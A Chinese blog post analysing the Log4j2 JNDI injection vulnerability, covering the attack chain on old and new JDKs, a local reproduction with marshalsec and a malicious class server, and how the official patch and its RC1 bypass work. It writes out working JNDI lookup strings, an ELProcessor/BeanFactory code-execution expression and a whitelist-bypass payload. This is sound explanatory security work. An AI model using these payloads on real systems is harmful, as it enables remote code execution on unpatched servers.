一、前言
上周五(12月10日)应该是全世界程序员都不得安宁的一天。楼主早上一到公司就收到安全部分通知Log4j2出现严重安全漏洞,攻击者可以利用该漏洞在服务器上执行任意指令,从而操控服务器。于是一整天我们整个团队都在忙于修复Log4j2漏洞。从最开始修改JVM参数,到后来的2.15.0-RC1版本,再到最后的2.15.0发布版,简直是一波三折啊。当时我们还在和同事开玩笑,“今天全世界程序员都要加班了”。
漏洞修复完成后,作为一个程序对代码起码的尊重,楼主便开始通过各种途径查找本次漏洞相关各类资料,打算对漏洞做一个全面分析了解。抱着”知其然,且知其所以然“精神。于是楼主带着如下问题,开始了查找之旅。
1、Log4j2漏洞复现步骤(攻击步骤)
2、Log4j2漏洞的原理(为什么存在)
3、Log4j2漏洞中2.15.0-RC1版本为什么会被绕过
4、Log4j2最终修复方案(2.15.0)的原理是什么
通过大量的网络查找,楼主才终于弄清楚了上面的所有问题,同时也对本次漏洞有了深入的分析和理解。在这个过程中楼主发现一个问题,网上基本没有一篇文章能够把本次漏洞讲得清楚彻底。甚至网上通用的的复现步骤,在现在的Java主流版本中,根本就无法复现。因为该漏洞在java高版本和低版本下需要不同的攻击方式,才能达到攻击的目的。
于是楼主决定编写本文来和大家一起对该漏洞进行全面深入的剖析。本文将从如下基本方面进行讲解。
1、Log4j2漏洞的基本原理
2、Log4j2漏洞在Java高低版本中的攻击原理
3、Log4j2漏洞在Java高低版本中的攻击步骤
4、Log4j2漏洞在2.15.0-RC1中被绕过的原因
5、Log4j2最终修复方案(2.15.0)的原理
其实这个漏洞在11月底就被发现了,且Log4j2官方在12月5号就已经在开始修复该漏洞。
二、Log4j2漏洞原理
1、基础知识
A、什么是JNDI
JNDI全称 Java Naming and Directory Interface。JNDI是Java平台的一个标准扩展,提供了一组接口、类和关于命名空间的概念。如同其它很多Java技术一样,JDNI是provider-based的技术,暴露了一个API和一个服务供应接口(SPI)。这意味着任何基于名字的技术都能通过JNDI而提供服务,只要JNDI支持这项技术。JNDI目前所支持的技术包括LDAP、CORBA Common Object Service(COS)名字服务、RMI、NDS、DNS、Windows注册表等等。很多J2EE技术,包括EJB都依靠JNDI来组织和定位实体。
JDNI通过绑定的概念将对象和名称联系起来。在一个文件系统中,文件名被绑定给文件。在DNS中,一个IP地址绑定一个URL。在目录服务中,一个对象名被绑定给一个对象实体。
JNDI中的一组绑定作为上下文来引用。每个上下文暴露的一组操作是一致的。例如,每个上下文提供了一个查找操作,返回指定名字的相应对象。每个上下文都提供了绑定和撤除绑定名字到某个对象的操作。JNDI使用通用的方式来暴露命名空间,即使用分层上下文以及使用相同命名语法的子上下文。
参考:JNDI是什么_百度知道
简单来说:通过JNDI提供了"通过名称找到对应的对象"的规范定义,即SPI功能,实现则由具体的技术支持,如:LDAP,RMI,DNS,Database。比如在JNDI支持的数据源中,如下图(具体请参考:JNDI学习总结(一)——JNDI数据源的配置 - 孤傲苍狼 - 博客园),我们可以通过”jdbc/oracle“获取到Oracle对应的数据库连接池对象,并直接用于操作数据库即可。
B、什么是LDAP
目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。
LDAP(Light Directory Access Portocol),它是基于X.500标准的轻量级目录访问协议。
目录是一个为查询、浏览和搜索而优化的数据库,它成树状结构组织数据,类似文件目录一样。
目录数据库和关系数据库不同,它有优异的读性能,但写性能差,并且没有事务处理、回滚等复杂功能,不适于存储修改频繁的数据。所以目录天生是用来查询的,就好象它的名字一样。
LDAP目录服务是由目录数据库和一套访问协议组成的系统。
参考:LDAP概念和原理介绍 - WilburXu - 博客园
简单来说:LDAP是一个目录服务,可以通过目录路径查询到对应目录下的对象(文件)等。即其也是JNDI的实现,通过名称(目录路径)查询到对象(目录下的文件)。
C、什么是Codebase
Codebase就是存储代码或者编译文件的服务。其可以根据名称返回对应的代码或者编译文件,如果根据类名,提供类对应的Class文件。
参考:PSA: Log4Shell and the current state of JNDI injection – – Random ramblings, exploits and projects.
2、Java低版本原理(网上普遍攻击原理)
A、原理概述
Log4j2漏洞总的来说就是:因为Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:9999/Test}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。
B、恶意代码编写
我们一直在提到恶意的Class文件,那么恶意类的Java代码是怎样的呢?写个main函数?(给大家10秒钟时间想想)
如果大家初步理解了上面的原理概述就知道,直接写main函数不行,因为整个过程中Java并没有执行Class文件中的任何方法,只是使用累加器加载和实例化了该类而已。所以我们需要让代码在实例化的就会被执行。因此我们这类采用了静态块。其代码如下:
该模拟攻击代码比较简单,只是在mac电脑上打开文件管理器。
C、攻击流程与原理
接下来咱们一起分析下具体原理,整个攻击原理和流程如下图所示。
PS:由于源码涉及比较多,所以本文不会详细降解源码,只会大致梳理下关键调用链。其源码本身也比较简单,有兴趣的同学自己Debug跟一下,就能清楚的理解整个源码逻辑。
1、首先攻击者遭到存在风险的接口(接口会将前端输入直接通过日志打印出来),然后向该接口发送攻击内容:${jndi:ldap://localhost:9999/Test}。
2、被攻击服务器接收到该内容后,通过Logj42工具将其作为日志打印。
源码:org.apache.logging.slf4j.Log4jLogger.debug(...)/info(...)/error(...)等方法
> org.apache.logging.log4j.core.config.LoggerConfig.log(...)
> AbstractOutputStreamAppender.append(final LogEvent event)
3、此时Log4j2会解析${},读取出其中的内容。判断其为Ldap实现的JNDI。于是调用Java底层的Lookup方法,尝试完成Ldap的Lookup操作。
源码:StrSubstitutor.substitute(...) --解析出${}中的内容:jndi:ldap://localhost:9999/Test
> StrSubstitutor.resolveVariable(...) --处理解析出的内容,执行lookup
> Interpolator.lookup(...) --根据jndi找到jndi的处理类
> JndiLookup.lookup(...)
> JndiManager.lookup(...)
> java.naming.InitialContext.lookup(...) --调用Java底层的Lookup方法
PS:后续步骤都是Java内部提供的Lookup能力,和Log4j2无关。
4、请求Ldap服务器,获取到Ldap协议数据。Ldap会返回一个Codebase告诉客户端,需要从该Codebase去获取其需要的Class数据。
源码:LdapCtx.c_lookup(...) 请求并处理数据 (ldap中指定了javaCodeBase=)
>Obj.decodeObject --解析到ldap结果,得到classFactoryLocation=http://localhost:8888
> DirectoryManager.getObjectInstance(...) --请求Codebase得到对应类的结果
> NamingManager.getObjectFactoryFromReference(...) --请求Codebase
5、请求Ldap中返回的Codebase路径,去Codebase下载对应的Class文件,并通过类加载器将其加载为Class类,然后调用其默认构造函数将该Class类实例化成一个对象。
源码:VersionHelper12.loadClass(...) --请求Codebase得到Class并用类加载器加载
> NamingManager.getObjectFactoryFromReference(...) 通过默认构造函数实例化类。
这里就会导致我们攻击代码中的静态块中的内容被执行。
到此整个攻击原理就完成了。其实总体也很简单。归纳来看关键就如下几步:
1、攻击则发送带有恶意Ldap内容的字符串,让服务通过log4j2打印
2、log4j2解析到ldap内容,会调用底层Java去执行Ldap的lookup操作。
3、Java底层请求Ldap服务器(恶意服务器),得到了Codebase地址,告诉客户端去该地址获取他需要的类。
4、Java请求Codebase服务器(恶意服务器)获取到对应的类(恶意类),并在本地加载和实例化(触发恶意代码)。
PS:留个问题,因为恶意Factory类会被加载和通过默认构造函数构造,那么我们是否可以通过在默认构造函数中执行恶意代码来实现攻击,而不是在static静态块中实现?
3、JDK高版本为何无效
A、哪些版本受影响
上述所有操作都需要JDK版本低于JDK 8u191才可以实现。而JDK8u191的版本在三年前就已经发布了。所有现在主流的服务器应该都基本是JDK高版本的。所以该攻击在主流版本上无法使用。
参考:PSA: Log4Shell and the current state of JNDI injection – – Random ramblings, exploits and projects.
B、为何失效
那为什么该攻击在高版本无效呢?我们一起来看下。
其实是因为高版本在VersionHelper12.loadClass方法中加了一个判断,如下新增了”com.sun.jndi.ldap.object.trustURLCodebase“变量来控制是否允许请求Codebase下载所需的Class文件,且该变量默认为false。
所以高版本的Java的请求逻辑如下。即无法请求Codebase,整个攻击因此失效。
但是我们还是可以正常请求Ldap服务器,所以我们仍然有可能通过自己的恶意Ldap服务器构建返回恶意代码,从而实现注入攻击。接下来,我们就一起来讨论下高版本如何通过Ldap恶意服务器对服务器进行攻击。
C、手动修改trustURLCodebase实现攻击?
其实我们在模拟的时候完全可以通过System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");将其指定为true,这样我们就能够在高版本上执行攻击模拟。网上很多文章也确实是这样做的,但其基本没有解释这样做的原因。
如果是为了在高版本验证低版本的攻击步骤,那么这样做完全OK。但是对于分析Logj42漏洞原理来说,这样做就不太合适。因为分析的目的就是要知道高版本如何实现攻击。这样我们才能够找到具体的防护方法。
再者,如果你是攻击者,你该不会期望哪个服务器会主动把trustURLCodebase设置为true,等着你来攻击吧。
4、Java高版本原理
A、Lookup的基本功能
在开始分享高版本攻击原理前,我们需要先了解下Java底层Ldap的Lookup的基本功能。因为低版本攻击中,我们不太需要关注这一块,所以没有具体讲解。但高版本则需要依赖该功能达到攻击的目的。
当Java底层请求Ldap服务器后,Ldap主要返回了三个主要参数javaClassName、javaFactory、JavaFactoryLocaltion,以及一些额外参数。客户端获得这些参数之后主要做一件事情:构造需要的类实例。即客户端通过javaFactory类来构建实现我们需要的JavaClassName指定的实例。这个过程中需要注意如下几点:
1、javaFactory类需要是ObjectFactory的子类。
2、javaFactory有两个来源:来自Codebase(Ldap返回Codebase地址),或者来自本地(Ldap返回对应javaFactory的类地址)。
对于来自Codebase的Factory:和低版本中的逻辑一样,我们需要请求Codebase获取其Class文件,然后加载该Factory类,并使用默认构造函数实例化出Factory实例。
来自本地的Factory:则直接根据Ldap返回的路径(类限定符),通过Class.forName进行加载和实例化。
3、得到javaFactory实例后,我们需要构建通过javaFactory实例构建出JavaClassName指定的对象。
4、Log4j2通过javaFactory得到对应的对象之后,会调用其toString方法将其转换为字符串,然后用该字符串替换日志中的${...}内容,最后打印出来。
源码:DirectoryManager.getObjectInstance
B、攻击者如何利用Ldap
1、JDK低版本如何利用Ldap实现攻击
通过上面低版本的原理分析可知,我们根据在Ldap构造了javaFactoryLocation指向Codebase,告诉客户端需要从远端Codebase去获取需要的javaFactory类。获取到之后,然后使其使用本地的类加载器加载远程恶意的javaFactory类的,然后其在加载的过程中执行恶意的static代码块,从而实现攻击。
2、JDK高版本如何利用Ldap实现攻击
我们知道高版本已经无法去Codebase获取javaFactory的Class文件,所以我们想通过让客户端加载和实例化我们恶意构建的javaFactory来实现攻击是不可能的了。
但是,我们还可以走本地javaFactory这条路。即让Ldap实例化一个本地存在的javaFacotry,并用该javaFactory实例化一个本地存在的类。因此我们需要找到本地哪些javaFactory存在一些可以被利用的漏洞。
C、JDK高版本的具体攻击原理
高版本攻击原理参考:Exploiting JNDI Injections in Java | Veracode blog
参考文章中提到了tomcat携带的org.apache.naming.factory.BeanFactory类就是一个存在风险的ObjectFactory子类。通过该Factory我们可以通过默认构造函数实例化任意一个类,并调用其任意的只有一个String入参的公共方法,且其方法名可以不用是标准setter的名称,而可以是任意名称。因为我们可以通过forceString来制定某个String变量的setter方法名称。(具体逻辑大家自己看下BeanFactory.getObjectInstance的源码即可)
基于此能力,我们就可利用javax.el.ELProcessor类,因为其有个eval方法,只有一个Stirng入参。其可以执行EL表达式,从而执行任意指令。
比如我们让其执行如下EL表达式,就能够达到让其在mac下执行”open .“指令的功能。
\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['open','.']).start()\")
所以我们只需要Ldap服务器返回JavaFactory=org.apache.naming.factory.BeanFactory,javaClassName=javax.el.ELProcessor。同时传递参数x=上述恶意代码,forceString="x=eval"。
这样客户端拿到指令之后就会做如下操作:
1、直接在本地加载和实例化BeanFactory工厂,得到BeanFacory实例
2、BeanFactory工厂通过默认构造函数实例化javax.el.ELProcessor,得到ELProcessor实例
3、Ldap告诉BeanFactory,ELProcessor有一个string类型的变量x(实际没有),其内容为恶意代码块,且该变量的setter方法名为eval。
4、BeanFactory就会执行ELProcessor实例的eval方法,且入参为恶意代码块。
至此我们就达到执行让ELProcessor通过eval执行恶意代码的目的,从而实现远程攻击。
整个攻击流程如下:
Log4j2漏洞的攻击原理就介绍到这里。接下来我们一起来实战下基于Log4j2漏洞如何实现对服务器的攻击。
PS:给大家留个小问题,上述基于ELProcessor的攻击方法,有什么限制呢?
三、Log4j2漏洞复现步骤(攻击方法)
1、基础环境说明与搭建
通过上述原理分析可知,我们主要涉及到三个系统:被攻击服务、恶意Ldap服务和恶意Codebase服务。
A、被攻击服务搭建
这个服务比较简单,只需部署一个简单的web工程,然后要引入log4j2(2.15.0以下版本)打印日志。然后编写一个简单的Controller将接口传入的参数通过日志打印出来即可。
B、恶意Ldap服务搭建
搭建Ldap服务有两个途径:自己使用ldapsdk的jar包实现一个ldap服务,或者使用现成的marshalsec实现。
这里我们选择使用现成的marshalsec实现。
首先我们从github上克隆该代码(https://github.com/mbechler/marshalsec)
然后再工程根目录下执行mvn clean package -DskipTests对进行编译打包。
完成之后执行如下指令,在9999端口上启动该ldap服务:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8888/#Test 9999
开启之后会看到如下日志。
C、恶意Codebase服务搭建
这个服务比较简单,只需要在请求的时候,能够具体返回该请求对应的Class文件即可。
于是我们编写恶意代码Test.java,然后使用javac将其编译成Class文件。
然后我们在该目录执行python3 -m http.server 8888,在端口8888上基于该目录启动一个简单的http服务。当我们访问http://localhost:8888/Test.class的时候,该服务就会返回该目录下对应的Class文件。
2、Java低版本的复现步骤
现在我们开始执行恶意攻击。我们调用attack接口传入如下参数:
接着我们在Ldap的服务端可以看到如下日志,其表示其告诉客户端到Codebase去获取它需要的Class文件。
同时在Codebase的服务端可以看到如下日志。 标记了被攻击服务端来请求Test.class的记录和状态。
然后电脑就会弹出文件管理器。至此攻击完成。
3、Java高版本的复现步骤
通过攻击原理我们知道,高版本攻击我们不依赖Codebase服务。但是我们需要Ldap服务器返回ELProcessor相关的类。所以我们需要对marshalsec源码进行修改。然后重新编译打包再启动服务。
因为咱们攻击依赖的ELProcessor和BeanFactory存在Tomcat包中。所以我们需要在marshalsec工程中引入Tomcat依赖。
然后需要将LDAPRefServer类中的方法sendResult修改为如下内容:
然后我们通过mvn clean package -DskipTests对其进行重新编译打包。并通过java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8888/#Test 9999启动即可。(其实http://localhost:8888/#Test是Codebase地址我们没有使用,但是因为我们没有修改启动逻辑,所以仍然需要传递)
一切就绪之后,我们通过调用attack接口实现攻击了。
执行完成后,同样电脑就会弹出文件管理器。至此攻击完成。
四、Log4j2漏洞修复原理
1、修复原理(官方如何修复)
其实查看Log4j2最新提交的代码(https://github.com/apache/logging-log4j2),咱们很容易就能看到其修复方法。
官方主要通过两个途径来修复该问题:新增jndi开关(默认关闭)和新增jndi相关域名、协议和Class白名单。
A、新增Jndi开关
在JndiManager中新增了jndi开关,通过log4j2.enableJndi参数来控制。默认为false。
同时在新建JndiManager管理类时会判断,如果开关关闭,则创建空的JndiManager类,即空的JndiManager无法执行任何JNDI操作。
空JndiManager执行lookup方法时会直接返回null。不会执行真正的lookup逻辑。
B、新增白名单
由于Jndi功能在有些业务条件下需要使用。所以官方不能完全禁止用户使用。于是如果使用者主动开启了jndi功能,那么我们要怎么防止被攻击呢?官方使用了一个比较简单的办法,即给协议、class和域名都添加白名单。这样只要使用者合理的使用都不会有问题。
默认白名单的协议:JAVA、LDAP、LDAPS
默认白名单的域名:localhost
默认白名单支持的类:基本类型对应的对象。
在执行lookup的时候,其会校验对应的白名单。
官方修复方案的介绍就到这里。这里我们只讲解了核心代码,具体逻辑大家可以下载Log4j2的源码,查看从5号开始的改动即可。
PS:留个问题,为什么我们控制好了Jndi就可以解决由于Ldap导致的漏洞。
2、2.15.0-RC1版本为何会被绕过
这个版本的绕过和其实很有意思。原因是因为在JndiManager.lookup的方法中,当执行各类白名单过滤操作中,如果抛出异常。在RC1的版本中,其没有做任何处理,导致只要抛出异常就能够正常的执行后续的lookup逻辑。从而绕过了白名单检测。
于是后续做了修正,只要抛出异常就直接返回null。
那么我们可以如何绕过呢? 这里我们参考了文章安全漏洞之Log4j2漏洞复现绕过分析。通过URI
中不进行URL
编码会报报错URISyntaxException,在URL中添加一个空格即可触发,比如:${jndi:ldap://127.0.0.1:1389/ badClassName}。如下是对URI构造函数做空格测试的结果:
虽然
对空格做编码导致异常,但是lookup
时候会去掉这个空格。所以异常之后后续的lookup也能够正常执行。
3、JVM参数formatMsgNoLookups的修复原理(不建议)
这个比较简单,就是通过JVM设置一个参数formatMsgNoLookups=true。让Log4j2在处理${}消息的时候,不执行lookup操作。
其实这种方式也是可以解决漏洞的。但是存在一个问题:如果服务本身就需要利用Log4j2的jndi功能。配置参数后就无法使用。所以作为官方解决方案来说,该方法还是存在不妥之处。
于是官方最终采用了jdni开关+白名单的方式来解决了该问题。
至此Log4j2漏洞的深入剖析就和大家分享完了。如果你喜欢本文或觉得本文对你有所帮助,欢迎一键三连支持,非常感谢。
五、惯例
如果你喜欢本文或觉得本文对你有所帮助,欢迎一键三连支持,非常感谢。
如果你对本文有任何疑问或者高见,欢迎添加公众号lifeofcoder共同交流探讨(添加公众号可以获得楼主最新博文推送以及”Java高级架构“上10G视频和图文资料哦)。